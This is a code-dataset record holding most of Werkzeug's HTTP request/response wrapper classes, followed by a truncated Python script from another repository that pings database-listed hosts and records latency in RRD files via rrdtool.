#: .. versionadded:: 0.8
autocorrect_location_header = True
#: Should this response object automatically set the content-length
#: header if possible? This is true by default.
#:
#: .. versionadded:: 0.8
automatically_set_content_length = True
def __init__(self, response=None, status=None, headers=None,
mimetype=None, content_type=None, direct_passthrough=False):
if isinstance(headers, Headers):
self.headers = headers
elif not headers:
self.headers = Headers()
else:
self.headers = Headers(headers)
if content_type is None:
if mimetype is None and 'content-type' not in self.headers:
mimetype = self.default_mimetype
if mimetype is not None:
mimetype = get_content_type(mimetype, self.charset)
content_type = mimetype
if content_type is not None:
self.headers['Content-Type'] = content_type
if status is None:
status = self.default_status
if isinstance(status, integer_types):
self.status_code = status
else:
self.status = status
self.direct_passthrough = direct_passthrough
self._on_close = []
# we set the response after the headers so that if a class changes
# the charset attribute, the data is set in the correct charset.
if response is None:
self.response = []
elif isinstance(response, (text_type, bytes, bytearray)):
self.set_data(response)
else:
self.response = response
def call_on_close(self, func):
"""Adds a function to the internal list of functions that should
be called as part of closing down the response. Since 0.7 this
function also returns the function that was passed so that this
can be used as a decorator.
.. versionadded:: 0.6
"""
self._on_close.append(func)
return func
def __repr__(self):
if self.is_sequence:
body_info = '%d bytes' % sum(map(len, self.iter_encoded()))
else:
body_info = self.is_streamed and 'streamed' or 'likely-streamed'
return '<%s %s [%s]>' % (
self.__class__.__name__,
body_info,
self.status
)
@classmethod
def force_type(cls, response, environ=None):
"""Enforce that the WSGI response is a response object of the current
type. Werkzeug will use the :class:`BaseResponse` internally in many
situations like the exceptions. If you call :meth:`get_response` on an
exception you will get back a regular :class:`BaseResponse` object, even
if you are using a custom subclass.
This method can enforce a given response type, and it will also
convert arbitrary WSGI callables into response objects if an environ
is provided::
# convert a Werkzeug response object into an instance of the
# MyResponseClass subclass.
response = MyResponseClass.force_type(response)
# convert any WSGI application into a response object
response = MyResponseClass.force_type(response, environ)
This is especially useful if you want to post-process responses in
the main dispatcher and use functionality provided by your subclass.
Keep in mind that this will modify response objects in place if
possible!
:param response: a response object or wsgi application.
:param environ: a WSGI environment object.
:return: a response object.
"""
if not isinstance(response, BaseResponse):
if environ is None:
raise TypeError('cannot convert WSGI application into '
'response objects without an environ')
response = BaseResponse(*_run_wsgi_app(response, environ))
response.__class__ = cls
return response
@classmethod
def from_app(cls, app, environ, buffered=False):
"""Create a new response object from an application output. This
works best if you pass it an application that returns a generator all
the time. Sometimes applications may use the `write()` callable
returned by the `start_response` function. This tries to resolve such
edge cases automatically. But if you don't get the expected output
you should set `buffered` to `True` which enforces buffering.
:param app: the WSGI application to execute.
:param environ: the WSGI environment to execute against.
:param buffered: set to `True` to enforce buffering.
:return: a response object.
"""
return cls(*_run_wsgi_app(app, environ, buffered))
def _get_status_code(self):
return self._status_code
def _set_status_code(self, code):
self._status_code = code
try:
self._status = '%d %s' % (code, HTTP_STATUS_CODES[code].upper())
except KeyError:
self._status = '%d UNKNOWN' % code
status_code = property(_get_status_code, _set_status_code,
doc='The HTTP Status code as number')
del _get_status_code, _set_status_code
def _get_status(self):
return self._status
def _set_status(self, value):
self._status = to_native(value)
try:
self._status_code = int(self._status.split(None, 1)[0])
except ValueError:
self._status_code = 0
self._status = '0 %s' % self._status
status = property(_get_status, _set_status, doc='The HTTP Status code')
del _get_status, _set_status
def get_data(self, as_text=False):
"""The string representation of the request body. Whenever you call
this property the request iterable is encoded and flattened. This
can lead to unwanted behavior if you stream big data.
This behavior can be disabled by setting
:attr:`implicit_sequence_conversion` to `False`.
If `as_text` is set to `True` the return value will be a decoded
unicode string.
.. versionadded:: 0.9
"""
self._ensure_sequence()
rv = b''.join(self.iter_encoded())
if as_text:
rv = rv.decode(self.charset)
return rv
def set_data(self, value):
"""Sets a new string as response. The value set must either by a
unicode or bytestring. If a unicode string is set it's encoded
automatically to the charset of the response (utf-8 by default).
.. versionadded:: 0.9
"""
# if an unicode string is set, it's encoded directly so that we
# can set the content length
if isinstance(value, text_type):
value = value.encode(self.charset)
else:
value = bytes(value)
self.response = [value]
if self.automatically_set_content_length:
self.headers['Content-Length'] = str(len(value))
data = property(get_data, set_data, doc='''
A descriptor that calls :meth:`get_data` and :meth:`set_data`. This
should not be used and will eventually get deprecated.
''')
def calculate_content_length(self):
"""Returns the content length if available or `None` otherwise."""
try:
self._ensure_sequence()
except RuntimeError:
return None
return sum(len(x) for x in self.response)
def _ensure_sequence(self, mutable=False):
"""This method can be called by methods that need a sequence. If
`mutable` is true, it will also ensure that the response sequence
is a standard Python list.
.. versionadded:: 0.6
"""
if self.is_sequence:
# if we need a mutable object, we ensure it's a list.
if mutable and not isinstance(self.response, list):
self.response = list(self.response)
return
if self.direct_passthrough:
raise RuntimeError('Attempted implicit sequence conversion '
'but the response object is in direct '
'passthrough mode.')
if not self.implicit_sequence_conversion:
raise RuntimeError('The response object required the iterable '
'to be a sequence, but the implicit '
'conversion was disabled. Call '
'make_sequence() yourself.')
self.make_sequence()
def make_sequence(self):
"""Converts the response iterator in a list. By default this happens
automatically if required. If `implicit_sequence_conversion` is
disabled, this method is not automatically called and some properties
might raise exceptions. This also encodes all the items.
.. versionadded:: 0.6
"""
if not self.is_sequence:
# if we consume an iterable we have to ensure that the close
# method of the iterable is called if available when we tear
# down the response
close = getattr(self.response, 'close', None)
self.response = list(self.iter_encoded())
if close is not None:
self.call_on_close(close)
def iter_encoded(self):
"""Iter the response encoded with the encoding of the response.
If the response object is invoked as WSGI application the return
value of this method is used as application iterator unless
:attr:`direct_passthrough` was activated.
"""
charset = self.charset
if __debug__:
_warn_if_string(self.response)
# Encode in a separate function so that self.response is fetched
# early. This allows us to wrap the response with the return
# value from get_app_iter or iter_encoded.
return _iter_encoded(self.response, self.charset)
def set_cookie(self, key, value='', max_age=None, expires=None,
path='/', domain=None, secure=None, httponly=False):
"""Sets a cookie. The parameters are the same as in the cookie `Morsel`
object in the Python standard library but it accepts unicode data, too.
:param key: the key (name) of the cookie to be set.
:param value: the value of the cookie.
:param max_age: should be a number of seconds, or `None` (default) if
the cookie should last only as long as the client's
browser session.
:param expires: should be a `datetime` object or UNIX timestamp.
:param domain: if you want to set a cross-domain cookie. For example,
``domain=".example.com"`` will set a cookie that is
readable by the domain ``www.example.com``,
``foo.example.com`` etc. Otherwise, a cookie will only
be readable by the domain that set it.
:param path: limits the cookie to a given path, per default it will
span the whole domain.
"""
self.headers.add('Set-Cookie', dump_cookie(key, value, max_age,
expires, path, domain, secure, httponly,
self.charset))
def delete_cookie(self, key, path='/', domain=None):
"""Delete a cookie. Fails silently if key doesn't exist.
:param key: the key (name) of the cookie to be deleted.
:param path: if the cookie that should be deleted was limited to a
path, the path has to be defined here.
:param domain: if the cookie that should be deleted was limited to a
domain, that domain has to be defined here.
"""
self.set_cookie(key, expires=0, max_age=0, path=path, domain=domain)
@property
def is_streamed(self):
"""If the response is streamed (the response is not an iterable with
a length information) this property is `True`. In this case streamed
means that there is no information about the number of iterations.
This is usually `True` if a generator is passed to the response object.
This is useful for checking before applying some sort of post
filtering that should not take place for streamed responses.
"""
try:
len(self.response)
except (TypeError, AttributeError):
return True
return False
@property
def is_sequence(self):
"""If the iterator is buffered, this property will be `True`. A
response object will consider an iterator to be buffered if the
response attribute is a list or tuple.
.. versionadded:: 0.6
"""
return isinstance(self.response, (tuple, list))
def close(self):
"""Close the wrapped response if possible. You can also use the object
in a with statement which will automatically close it.
.. versionadded:: 0.9
Can now be used in a with statement.
"""
if hasattr(self.response, 'close'):
self.response.close()
for func in self._on_close:
func()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close()
def freeze(self):
"""Call this method if you want to make your response object ready for
being pickled. This buffers the generator if there is one. It will
also set the `Content-Length` header to the length of the body.
.. versionchanged:: 0.6
The `Content-Length` header is now set.
"""
# we explicitly set the length to a list of the *encoded* response
# iterator. Even if the implicit sequence conversion is disabled.
self.response = list(self.iter_encoded())
self.headers['Content-Length'] = str(sum(map(len, self.response)))
def get_wsgi_headers(self, environ):
"""This is automatically called right before the response is started
and returns headers modified for the given environment. It returns a
copy of the headers from the response with some modifications applied
if necessary.
For example the location header (if present) is joined with the root
URL of the environment. Also the content length is automatically set
to zero here for certain status codes.
.. versionchanged:: 0.6
Previously that function was called `fix_headers` and modified
the response object in place. Also since 0.6, IRIs in location
and content-location headers are handled properly.
Also starting with 0.6, Werkzeug will attempt to set the content
length if it is able to figure it out on its own. This is the
case if all the strings in the response iterable are already
encoded and the iterable is buffered.
:param environ: the WSGI environment of the request.
:return: returns a new :class:`~werkzeug.datastructures.Headers`
object.
"""
headers = Headers(self.headers)
location = None
content_location = None
content_length = None
status = self.status_code
# iterate over the headers to find all values in one go. Because
# get_wsgi_headers is used each response that gives us a tiny
# speedup.
for key, value in headers:
ikey = key.lower()
if ikey == u'location':
location = value
elif ikey == u'content-location':
content_location = value
elif ikey == u'content-length':
content_length = value
# make sure the location header is an absolute URL
if location is not None:
old_location = location
if isinstance(location, text_type):
location = iri_to_uri(location)
if self.autocorrect_location_header:
current_url = get_current_url(environ, root_only=True)
if isinstance(current_url, text_type):
current_url = iri_to_uri(current_url)
location = url_join(current_url, location)
if location != old_location:
headers['Location'] = location
# make sure the content location is a URL
if content_location is not None and \
isinstance(content_location, text_type):
headers['Content-Location'] = iri_to_uri(content_location)
# remove entity headers and set content length to zero if needed.
# Also update content_length accordingly so that the automatic
# content length detection does not trigger in the following
# code.
if 100 <= status < 200 or status == 204:
headers['Content-Length'] = content_length = u'0'
elif status == 304:
remove_entity_headers(headers)
# if we can determine the content length automatically, we
# should try to do that. But only if this does not involve
# flattening the iterator or encoding of unicode strings in
# the response. We however should not do that if we have a 304
# response.
if self.automatically_set_content_length and \
self.is_sequence and content_length is None and status != 304:
try:
content_length = sum(len(to_bytes(x, 'ascii')) for x in self.response)
except UnicodeError:
# aha, something non-bytestringy in there, too bad, we
# can't safely figure out the length of the response.
pass
else:
headers['Content-Length'] = str(content_length)
return headers
def get_app_iter(self, environ):
"""Returns the application iterator for the given environ. Depending
on the request method and the current status code the return value
might be an empty response rather than the one from the response.
If the request method is `HEAD` or the status code is in a range
where the HTTP specification requires an empty response, an empty
iterable is returned.
.. versionadded:: 0.6
:param environ: the WSGI environment of the request.
:return: a response iterable.
"""
status = self.status_code
if environ['REQUEST_METHOD'] == 'HEAD' or \
100 <= status < 200 or status in (204, 304):
iterable = ()
elif self.direct_passthrough:
if __debug__:
_warn_if_string(self.response)
return self.response
else:
iterable = self.iter_encoded()
return ClosingIterator(iterable, self.close)
def get_wsgi_response(self, environ):
"""Returns the final WSGI response as tuple. The first item in
the tuple is the application iterator, the second the status and
the third the list of headers. The response returned is created
specially for the given environment. For example if the request
method in the WSGI environment is ``'HEAD'`` the response will
be empty and only the headers and status code will be present.
.. versionadded:: 0.6
:param environ: the WSGI environment of the request.
:return: an ``(app_iter, status, headers)`` tuple.
"""
headers = self.get_wsgi_headers(environ)
app_iter = self.get_app_iter(environ)
return app_iter, self.status, headers.to_wsgi_list()
def __call__(self, environ, start_response):
"""Process this response as WSGI application.
:param environ: the WSGI environment.
:param start_response: the response callable provided by the WSGI
server.
:return: an application iterator
"""
app_iter, status, headers = self.get_wsgi_response(environ)
start_response(status, headers)
return app_iter
class AcceptMixin(object):
"""A mixin for classes with an :attr:`~BaseResponse.environ` attribute
to get all the HTTP accept headers as
:class:`~werkzeug.datastructures.Accept` objects (or subclasses
thereof).
"""
@cached_property
def accept_mimetypes(self):
"""List of mimetypes this client supports as
:class:`~werkzeug.datastructures.MIMEAccept` object.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT'), MIMEAccept)
@cached_property
def accept_charsets(self):
"""List of charsets this client supports as
:class:`~werkzeug.datastructures.CharsetAccept` object.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT_CHARSET'),
CharsetAccept)
@cached_property
def accept_encodings(self):
"""List of encodings this client accepts. Encodings in a HTTP term
are compression encodings such as gzip. For charsets have a look at
:attr:`accept_charset`.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT_ENCODING'))
@cached_property
def accept_languages(self):
"""List of languages this client accepts as
:class:`~werkzeug.datastructures.LanguageAccept` object.
.. versionchanged 0.5
In previous versions this was a regular
:class:`~werkzeug.datastructures.Accept` object.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT_LANGUAGE'),
LanguageAccept)
class ETagRequestMixin(object):
"""Add entity tag and cache descriptors to a request object or object with
a WSGI environment available as :attr:`~BaseRequest.environ`. This not
only provides access to etags but also to the cache control header.
"""
@cached_property
def cache_control(self):
"""A :class:`~werkzeug.datastructures.RequestCacheControl` object
for the incoming cache control headers.
"""
cache_control = self.environ.get('HTTP_CACHE_CONTROL')
return parse_cache_control_header(cache_control, None,
RequestCacheControl)
@cached_property
def if_match(self):
"""An object containing all the etags in the `If-Match` header.
:rtype: :class:`~werkzeug.datastructures.ETags`
"""
return parse_etags(self.environ.get('HTTP_IF_MATCH'))
@cached_property
def if_none_match(self):
"""An object containing all the etags in the `If-None-Match` header.
:rtype: :class:`~werkzeug.datastructures.ETags`
"""
return parse_etags(self.environ.get('HTTP_IF_NONE_MATCH'))
@cached_property
def if_modified_since(self):
"""The parsed `If-Modified-Since` header as datetime object."""
return parse_date(self.environ.get('HTTP_IF_MODIFIED_SINCE'))
@cached_property
def if_unmodified_since(self):
"""The parsed `If-Unmodified-Since` header as datetime object."""
return parse_date(self.environ.get('HTTP_IF_UNMODIFIED_SINCE'))
@cached_property
def if_range(self):
"""The parsed `If-Range` header.
.. versionadded:: 0.7
:rtype: :class:`~werkzeug.datastructures.IfRange`
"""
return parse_if_range_header(self.environ.get('HTTP_IF_RANGE'))
@cached_property
def range(self):
"""The parsed `Range` header.
.. versionadded:: 0.7
:rtype: :class:`~werkzeug.datastructures.Range`
"""
return parse_range_header(self.environ.get('HTTP_RANGE'))
class UserAgentMixin(object):
"""Adds a `user_agent` attribute to the request object which contains the
parsed user agent of the browser that triggered the request as a
:class:`~werkzeug.useragents.UserAgent` object.
"""
@cached_property
def user_agent(self):
"""The current user agent."""
from werkzeug.useragents import UserAgent
return UserAgent(self.environ)
class AuthorizationMixin(object):
"""Adds an :attr:`authorization` property that represents the parsed
value of the `Authorization` header as
:class:`~werkzeug.datastructures.Authorization` object.
"""
@cached_property
def authorization(self):
"""The `Authorization` object in parsed form."""
header = self.environ.get('HTTP_AUTHORIZATION')
return parse_authorization_header(header)
class StreamOnlyMixin(object):
"""If mixed in before the request object this will change the bahavior
of it to disable handling of form parsing. This disables the
:attr:`files`, :attr:`form` attributes and will just provide a
:attr:`stream` attribute that however is always available.
.. versionadded:: 0.9
"""
disable_data_descriptor = True
want_form_data_parsed = False
class ETagResponseMixin(object):
"""Adds extra functionality to a response object for etag and cache
handling. This mixin requires an object with at least a `headers`
object that implements a dict like interface similar to
:class:`~werkzeug.datastructures.Headers`.
If you want the :meth:`freeze` method to automatically add an etag, you
have to mixin this method before the response base class. The default
response class does not do that.
"""
@property
def cache_control(self):
"""The Cache-Control general-header field is used to specify
directives that MUST be obeyed by all caching mechanisms along the
request/response chain.
"""
def on_update(cache_control):
if not cache_control and 'cache-control' in self.headers:
del self.headers['cache-control']
elif cache_control:
self.headers['Cache-Control'] = cache_control.to_header()
return parse_cache_control_header(self.headers.get('cache-control'),
on_update,
ResponseCacheControl)
def make_conditional(self, request_or_environ):
"""Make the response conditional to the request. This method works
best if an etag was defined for the response already. The `add_etag`
method can be used to do that. If called without etag just the date
header is set.
This does nothing if the request method in the request or environ is
anything but GET or HEAD.
It does not remove the body of the response because that's something
the :meth:`__call__` function does for us automatically.
Returns self so that you can do ``return resp.make_conditional(req)``
but modifies the object in-place.
:param request_or_environ: a request object or WSGI environment to be
used to make the response conditional
against.
"""
environ = _get_environ(request_or_environ)
if environ['REQUEST_METHOD'] in ('GET', 'HEAD'):
# if the date is not in the headers, add it now. We however
# will not override an already existing header. Unfortunately
# this header will be overriden by many WSGI servers including
# wsgiref.
if 'date' not in self.headers:
self.headers['Date'] = http_date()
if 'content-length' not in self.headers:
length = self.calculate_content_length()
if length is not None:
self.headers['Content-Length'] = length
if not is_resource_modified(environ, self.headers.get('etag'), None,
self.headers.get('last-modified')):
self.status_code = 304
return self
def add_etag(self, overwrite=False, weak=False):
"""Add an etag for the current response if there is none yet."""
if overwrite or 'etag' not in self.headers:
self.set_etag(generate_etag(self.get_data()), weak)
def set_etag(self, etag, weak=False):
"""Set the etag, and override the old one if there was one."""
self.headers['ETag'] = quote_etag(etag, weak)
def get_etag(self):
"""Return a tuple in the form ``(etag, is_weak)``. If there is no
ETag the return value is ``(None, None)``.
"""
return unquote_etag(self.headers.get('ETag'))
def freeze(self, no_etag=False):
"""Call this method if you want to make your response object ready for
pickeling. This buffers the generator if there is one. This also
sets the etag unless `no_etag` is set to `True`.
"""
if not no_etag:
self.add_etag()
super(ETagResponseMixin, self).freeze()
accept_ranges = header_property('Accept-Ranges', doc='''
The `Accept-Ranges` header. Even though the name would indicate
that multiple values are supported, it must be one string token only.
The values ``'bytes'`` and ``'none'`` are common.
.. versionadded:: 0.7''')
def _get_content_range(self):
def on_update(rng):
if not rng:
del self.headers['content-range']
else:
self.headers['Content-Range'] = rng.to_header()
rv = parse_content_range_header(self.headers.get('content-range'),
on_update)
# always provide a content range object to make the descriptor
# more user friendly. It provides an unset() method that can be
# used to remove the header quickly.
if rv is None:
rv = ContentRange(None, None, None, on_update=on_update)
return rv
def _set_content_range(self, value):
if not value:
del self.headers['content-range']
elif isinstance(value, string_types):
self.headers['Content-Range'] = value
else:
self.headers['Content-Range'] = value.to_header()
content_range = property(_get_content_range, _set_content_range, doc='''
The `Content-Range` header as
:class:`~werkzeug.datastructures.ContentRange` object. Even if the
header is not set it wil provide such an object for easier
manipulation.
.. versionadded:: 0.7''')
del _get_content_range, _set_content_range
class ResponseStream(object):
"""A file descriptor like object used by the :class:`ResponseStreamMixin` to
represent the body of the stream. It directly pushes into the response
iterable of the response object.
"""
mode = 'wb+'
def __init__(self, response):
self.response = response
self.closed = False
def write(self, value):
if self.closed:
raise ValueError('I/O operation on closed file')
self.response._ensure_sequence(mutable=True)
self.response.response.append(value)
def writelines(self, seq):
for item in seq:
self.write(item)
def close(self):
self.closed = True
def flush(self):
if self.closed:
raise ValueError('I/O operation on closed file')
def isatty(self):
if self.closed:
raise ValueError('I/O operation on closed file')
return False
@property
def encoding(self):
return self.response.charset
class ResponseStreamMixin(object):
"""Mixin for :class:`BaseRequest` subclasses. Classes that inherit from
this mixin will automatically get a :attr:`stream` property that provides
a write-only interface to the response iterable.
"""
@cached_property
def stream(self):
"""The response iterable as write-only stream."""
return ResponseStream(self)
class CommonRequestDescriptorsMixin(object):
"""A mixin for :class:`BaseRequest` subclasses. Request objects that
mix this class in will automatically get descriptors for a couple of
HTTP headers with automatic type conversion.
.. versionadded:: 0.5
"""
content_type = environ_property('CONTENT_TYPE', doc='''
The Content-Type entity-header field indicates the media type of
the entity-body sent to the recipient or, in the case of the HEAD
method, the media type that would have been sent had the request
been a GET.''')
@cached_property
def content_length(self):
"""The Content-Length entity-header field indicates the size of the
entity-body in bytes or, in the case of the HEAD method, the size of
the entity-body that would have been sent had the request been a
GET.
"""
return get_content_length(self.environ)
content_encoding = environ_property('HTTP_CONTENT_ENCODING', doc='''
The Content-Encoding entity-header field is used as a modifier to the
media-type. When present, its value indicates what additional content
codings have been applied to the entity-body, and thus what decoding
mechanisms must be applied in order to obtain the media-type
referenced by the Content-Type header field.
.. versionadded:: 0.9''')
content_md5 = environ_property('HTTP_CONTENT_MD5', doc='''
The Content-MD5 entity-header field, as defined in RFC 1864, is an
MD5 digest of the entity-body for the purpose of providing an
end-to-end message integrity check (MIC) of the entity-body. (Note:
a MIC is good for detecting accidental modification of the
entity-body in transit, but is not proof against malicious attacks.)
.. versionadded:: 0.9''')
referrer = environ_property('HTTP_REFERER', doc='''
The Referer[sic] request-header field allows the client to specify,
for the server's benefit, the address (URI) of the resource from which
the Request-URI was obtained (the "referrer", although the header
field is misspelled).''')
date = environ_property('HTTP_DATE', None, parse_date, doc='''
The Date general-header field represents the date and time at which
the message was originated, having the same semantics as orig-date
in RFC 822.''')
max_forwards = environ_property('HTTP_MAX_FORWARDS', None, int, doc='''
The Max-Forwards request-header field provides a mechanism with the
TRACE and OPTIONS methods to limit the number of proxies or gateways
that can forward the request to the next inbound server.''')
def _parse_content_type(self):
if not hasattr(self, '_parsed_content_type'):
self._parsed_content_type = \
parse_options_header(self.environ.get('CONTENT_TYPE', ''))
@property
def mimetype(self):
"""Like :attr:`content_type` but without parameters (eg, without
charset, type etc.). For example if the content
type is ``text/html; charset=utf-8`` the mimetype would be
``'text/html'``.
"""
self._parse_content_type()
return self._parsed_content_type[0]
@property
def mimetype_params(self):
"""The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
"""
self._parse_content_type()
return self._parsed_content_type[1]
@cached_property
def pragma(self):
"""The Pragma general-header field is used to include
implementation-specific directives that might apply to any recipient
along the request/response chain. All pragma directives specify
optional behavior from the viewpoint of the protocol; however, some
systems MAY require that behavior be consistent with the directives.
"""
return parse_set_header(self.environ.get('HTTP_PRAGMA', ''))
class CommonResponseDescriptorsMixin(object):
"""A mixin for :class:`BaseResponse` subclasses. Response objects that
mix this class in will automatically get descriptors for a couple of
HTTP headers with automatic type conversion.
"""
def _get_mimetype(self):
ct = self.headers.get('content-type')
if ct:
return ct.split(';')[0].strip()
def _set_mimetype(self, value):
self.headers['Content-Type'] = get_content_type(value, self.charset)
def _get_mimetype_params(self):
def on_update(d):
self.headers['Content-Type'] = \
dump_options_header(self.mimetype, d)
d = parse_options_header(self.headers.get('content-type', ''))[1]
return CallbackDict(d, on_update)
mimetype = property(_get_mimetype, _set_mimetype, doc='''
The mimetype (content type without charset etc.)''')
mimetype_params = property(_get_mimetype_params, doc='''
The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
.. versionadded:: 0.5
''')
location = header_property('Location', doc='''
The Location response-header field is used to redirect the recipient
to a location other than the Request-URI for completion of the request
or identification of a new resource.''')
age = header_property('Age', None, parse_date, http_date, doc='''
The Age response-header field conveys the sender's estimate of the
amount of time since the response (or its revalidation) was
generated at the origin server.
Age values are non-negative decimal integers, representing time in
seconds.''')
content_type = header_property('Content-Type', doc='''
The Content-Type entity-header field indicates the media type of the
entity-body sent to the recipient or, in the case of the HEAD method,
the media type that would have been sent had the request been a GET.
''')
content_length = header_property('Content-Length', None, int, str, doc='''
The Content-Length entity-header field indicates the size of the
entity-body, in decimal number of OCTETs, sent to the recipient or,
in the case of the HEAD method, the size of the entity-body that would
have been sent had the request been a GET.''')
content_location = header_property('Content-Location', doc='''
The Content-Location entity-header field MAY be used to supply the
resource location for the entity enclosed in the message when that
entity is accessible from a location separate from the requested
resource's URI.''')
content_encoding = header_property('Content-Encoding', doc='''
The Content-Encoding entity-header field is used as a modifier to the
media-type. When present, its value indicates what additional content
codings have been applied to the entity-body, and thus what decoding
mechanisms must be applied in order to obtain the media-type
referenced by the Content-Type header field.''')
content_md5 = header_property('Content-MD5', doc='''
The Content-MD5 entity-header field, as defined in RFC 1864, is an
MD5 digest of the entity-body for the purpose of providing an
end-to-end message integrity check (MIC) of the entity-body. (Note:
a MIC is good for detecting accidental modification of the
entity-body in transit, but is not proof against malicious attacks.)
''')
date = header_property('Date', None, parse_date, http_date, doc='''
The Date general-header field represents the date and time at which
the message was originated, having the same semantics as orig-date
in RFC 822.''')
expires = header_property('Expires', None, parse_date, http_date, doc='''
The Expires entity-header field gives the date/time after which the
response is considered stale. A stale cache entry may not normally be
returned by a cache.''')
last_modified = header_property('Last-Modified', None, parse_date,
http_date, doc='''
The Last-Modified entity-header field indicates the date and time at
which the origin server believes the variant was last modified.''')
def _get_retry_after(self):
value = self.headers.get('retry-after')
if value is None:
return
elif value.isdigit():
return datetime.utcnow() + timedelta(seconds=int(value))
return parse_date(value)
def _set_retry_after(self, value):
if value is None:
if 'retry-after' in self.headers:
del self.headers['retry-after']
return
elif isinstance(value, datetime):
value = http_date(value)
else:
value = str(value)
self.headers['Retry-After'] = value
retry_after = property(_get_retry_after, _set_retry_after, doc='''
The Retry-After response-header field can be used with a 503 (Service
Unavailable) response to indicate how long the service is expected
to be unavailable to the requesting client.
Time in seconds until expiration or date.''')
def _set_property(name, doc=None):
def fget(self):
def on_update(header_set):
if not header_set and name in self.headers:
del self.headers[name]
elif header_set:
self.headers[name] = header_set.to_header()
return parse_set_header(self.headers.get(name), on_update)
def fset(self, value):
if not value:
del self.headers[name]
elif isinstance(value, string_types):
self.headers[name] = value
else:
self.headers[name] = dump_header(value)
return property(fget, fset, doc=doc)
vary = _set_property('Vary', doc='''
The Vary field value indicates the set of request-header fields that
fully determines, while the response is fresh, whether a cache is
permitted to use the response to reply to a subsequent request
without revalidation.''')
content_language = _set_property('Content-Language', doc='''
The Content-Language entity-header field describes the natural
language(s) of the intended audience for the enclosed entity. Note
that this might not be equivalent to all the languages used within
the entity-body.''')
allow = _set_property('Allow', doc='''
The Allow entity-header field lists the set of methods supported
by the resource identified by the Request-URI. The purpose of this
field is strictly to inform the recipient of valid methods
associated with the resource. An Allow header field MUST be
present in a 405 (Method Not Allowed) response.''')
del _set_property, _get_mimetype, _set_mimetype, _get_retry_after, \
_set_retry_after
class WWWAuthenticateMixin(object):
"""Adds a :attr:`www_authenticate` property to a response object."""
@property
def www_authenticate(self):
"""The `WWW-Authenticate` header in a parsed form."""
def on_update(www_auth):
if not www_auth and 'www-authenticate' in self.headers:
del self.headers['www-authenticate']
elif www_auth:
self.headers['WWW-Authenticate'] = www_auth.to_header()
header = self.headers.get('www-authenticate')
return parse_www_authenticate_header(header, on_update)
class Request(BaseRequest, AcceptMixin, ETagRequestMixin,
UserAgentMixin, AuthorizationMixin,
CommonRequestDescriptorsMixin):
"""Full featured request object implementing the following mixins:
- :class:`AcceptMixin` for accept header parsing
- :class:`ETagRequestMixin` for etag and cache control handling
- :class:`UserAgentMixin` for user agent introspection
- :class:`AuthorizationMixin` for http auth handling
- :class:`CommonRequestDescriptorsMixin` for common headers
"""
class PlainRequest(StreamOnlyMixin, Request):
"""A request object without special form parsing capabilities.
.. versionadded:: 0.9
"""
class Response(BaseResponse, ETagResponseMixin, ResponseStreamMixin,
CommonResponseDescriptorsMixin,
WWWAuthenticateMixin):
"""Full featured response object implementing the following mixins:
- :class:`ETagResponseMixin` for etag and cache control handling
- :class:`ResponseStreamMixin` to add support for the `stream` property
- :class:`CommonResponseDescriptorsMixin` for various HTTP descriptors
- :class:`WWWAuthenticateMixin` for HTTP authentication support
"""
| apache-2.0 |
sygard/dns_mdb | scripts/rrd_service.py | 1 | 4083 | #!/usr/bin/env python
# coding: utf-8
import os,sys,datetime,argparse,threading,time,Queue
from commands import getstatusoutput
parser = argparse.ArgumentParser(description = 'Ping hosts from mdb')
parser.add_argument('-t', '--type', default='all',\
help="Which type of host to operate on")
parser.add_argument('-d', '--debug', action='store_true',\
help="Turn on debugging")
parser.add_argument('--show-types', dest='show_types', action='store_true',\
help='Show available host types')
parser.add_argument('--num-threads', dest='num_threads', type=int, default=1,\
help='Number of threads used for pinging hosts')
parser.add_argument('--num-pings', dest='num_pings', type=int, default=5,\
help='Number of ping requests to each host. More requests gives a more accurate average calculation.')
parser.add_argument('--rrd-path', dest='rrd_path', required=True,\
help='Specify the path to the rrd files')
args = parser.parse_args()
from django.core.management import setup_environ
from django.core.mail import mail_admins
from dns_mdb import settings
setup_environ(settings)
from mdb.models import *
PING_CMD='ping -W 1 -c %d -n -q %s | grep rtt | cut -d " " -f4'
queue = Queue.Queue()
RRD_CREATE = "%s " \
"DS:ttl:GAUGE:600:U:U "\
"RRA:AVERAGE:0.5:1:576 "\
"RRA:AVERAGE:0.5:6:336 "\
"RRA:AVERAGE:0.5:72:124 "\
"RRA:AVERAGE:0.5:288:365"
RRD_UPDATE = "%s --template rtt N:%s"
RRD_DIR = args.rrd_path
RRDTOOL = "/usr/bin/rrdtool"
class RrdService():
def log(self, host, interface, avg_ping):
rrd = self.get_rrd(host, interface)
self.update_rrd(rrd, avg_ping)
def get_rrd(self, host, interface):
return "%s/%s_%s.rrd" % ( RRD_DIR, host.id,\
interface.id)
def update_rrd(self, rrd, avg_ping):
self.create_rrd(rrd)
self.rrd_exec("update", RRD_UPDATE % (rrd, avg_ping))
def create_rrd(self, rrd):
if os.path.isfile(rrd):
return True
if args.debug:
print "Creating rrd: " + rrd
if not self.rrd_exec("create", RRD_CREATE % rrd):
if args.debug:
print "Could not create RRD database."
return False
return True
def rrd_exec(self, function, rrd_cmd):
cmd = "%s %s %s" % (RRDTOOL, function, rrd_cmd)
if args.debug:
print "RRD_EXEC (%s)" % cmd
if os.system(cmd) != 0:
return False
else:
return True
class PingThread(threading.Thread):
""" Threaded ping """
def __init__(self, host_queue, rrd_service):
threading.Thread.__init__(self)
self.queue = queue
self.rrd_service = rrd_service
def run(self):
while True:
host = self.queue.get()
self.do_ping_host(host)
self.queue.task_done()
def do_ping_host(self, host):
interfaces = host.interface_set.all()
for interface in interfaces:
self.do_ping_interface(interface, host)
def do_ping_interface(self, interface, host):
res = self.do_ping_ipaddr(interface.ip4address.address)
if res == None:
if args.debug:
print "%s (%s/%s) : fail " % (host, \
interface.name, interface.ip4address.address)
return
if args.debug:
print "%s (%s/%s) : %s" % (host, interface.name, \
interface.ip4address.address, res)
self.rrd_service.log(host,interface, res[1])
def do_ping_ipaddr(self, ipaddr):
status, output = getstatusoutput(PING_CMD % (args.num_pings,ipaddr))
if status == 0 and len(output) > 0:
return output.split("/")
else:
return None
def show_host_types():
types = HostType.objects.all()
for t in types:
